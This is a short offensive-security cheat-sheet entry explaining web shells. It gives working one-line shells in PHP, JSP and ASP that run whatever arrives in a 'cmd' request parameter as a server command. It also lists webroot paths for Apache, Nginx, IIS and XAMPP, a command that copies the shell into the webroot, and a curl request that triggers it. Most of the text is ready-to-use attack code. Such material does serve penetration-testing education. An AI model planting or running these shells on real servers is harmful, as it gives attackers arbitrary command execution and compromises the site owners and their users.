Web Shell

A Web Shell is a technique where we upload a script written in the programming language a website is based on, that lets the app accept commands through HTTP request parameters, and pass them to the server's system to be executed by the internal shell.

This process can be done when we have access to the target's root web directory, and we can upload a script to be executed through the web browser.

Basic script

• Create a script that processes the parameter from the request for the corresponding web language

WebShell.php

<?php system($_REQUEST["cmd"]); ?> #PHP server

WebShell.jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %> #Java JSP server

WebShell.asp

<% eval request("cmd") %> #Microsoft .Net server

• Then upload the script to the webroot directory of the server on the target machine. Some directories for well-known servers are:

  • /var/www/html/ for Apache

  • /usr/local/nginx/html/ for Nginx

  • C:\inetpub\wwwroot for IIS

  • C:\xampp\htdocs\ for XAMPP

cat $webshellscript > $webroot/$webshellscript

• Access to the Web Shell by sending a request with the URL parameter defined on the script to send a command as value to execute it

curl http://$IP:$port/shell.php?cmd=$command